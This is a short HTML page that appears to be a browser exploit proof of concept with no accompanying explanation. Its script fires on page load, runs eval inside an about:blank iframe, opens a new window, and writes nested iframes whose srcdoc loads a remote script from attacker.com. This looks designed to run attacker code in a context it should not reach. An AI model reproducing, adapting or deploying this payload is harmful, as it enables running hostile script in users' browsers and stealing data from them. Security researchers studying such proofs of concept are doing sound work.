<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
<iframe id="GGGGGmsyYgGGGGG" src="about:blank"></iframe>
<script>
window.onload = function() {
    GGGGGmsyYgGGGGG.onload=_=>GGGGGmsyYgGGGGG.contentWindow.eval("w=window.open('about:blank'); w.document.write('<iframe id=GGGmsyYgGGG src=about:blank><\/iframe><script>GGGmsyYgGGG.addEventListener(\x22load\x22,()=>{GGGmsyYgGGG.srcdoc=\x22<script src=https://attacker.com/static/static.js><\\/script>\x22;},{once:true});<\/script>');");GGGGGmsyYgGGGGG.contentWindow.location.reload();
};
</script>
</body>
</html>